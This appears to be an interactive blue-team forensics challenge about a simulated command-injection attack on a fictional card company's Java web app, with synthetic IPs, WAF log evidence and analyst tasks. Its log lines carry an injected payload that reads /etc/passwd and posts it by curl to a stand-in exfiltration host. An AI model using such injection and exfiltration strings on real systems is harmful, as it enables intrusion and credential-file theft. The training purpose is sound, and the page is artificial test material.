BlueTeamFiles Challenge • Web RCE → /etc/passwd Exfil
All synthetic & inert • RFC 5737 IPs • .example domains • Per‑task submission & explanations
Score: 0 0%

Scenario

Company: Asteria Cards Ltd (imaginary)

Alert: WAF anomaly + outbound proxy suggest possible RCE on Internet‑facing Java web app, followed by /etc/passwd access and HTTPS exfil.

Goals: identify vector, reconstruct process chain, confirm access & exfil, map ATT&CK techniques.

Environment (synthetic)

  • Attacker: 198.51.100.88
  • VIP (public): 192.0.2.30
  • Reverse proxy: 192.0.2.31
  • App host: 10.24.6.31 (app-ws-31.corp.example)
  • Resolver: 192.0.2.53
  • Outbound proxy: 192.0.2.50
  • Exfil domain: store.nimbus-cdn.example203.0.113.44

Timer

Elapsed: 00:00

Evidence Tabs

2025-11-19T21:45:12Z 192.0.2.30 WAF NOTICE rule=RCE_CommandInjection phase=2 action=ALLOW(mode=learning)
  client=198.51.100.88 req="GET /api/export?fmt=csv;cat%20/etc/passwd%20>%20/tmp/.s;curl%20-sS%20-X%20POST%20https://store.nimbus-cdn.example/u%20--data-binary%20@/tmp/.s HTTP/1.1"
  ua="Mozilla/5.0 Asteria/2.4" id=910021 tags=[attack,rce,cmd]
2025-11-19T21:45:31Z 192.0.2.30 WAF ALERT  rule=RCE_CommandInjection phase=2 action=BLOCK
  client=198.51.100.88 req="GET /api/export?fmt=tsv;id;uname%20-a" ua="curl/7.85.0" id=910021
      

Tasks

Task 1 — Pinpoint the RCE vector

Which endpoint and parameter were abused for OS command injection?

Task 2 — Select all suspicious log lines

Choose every line that directly evidences the RCE chain (read + exfil).

Task 3 — Map MITRE ATT&CK techniques (select all that apply)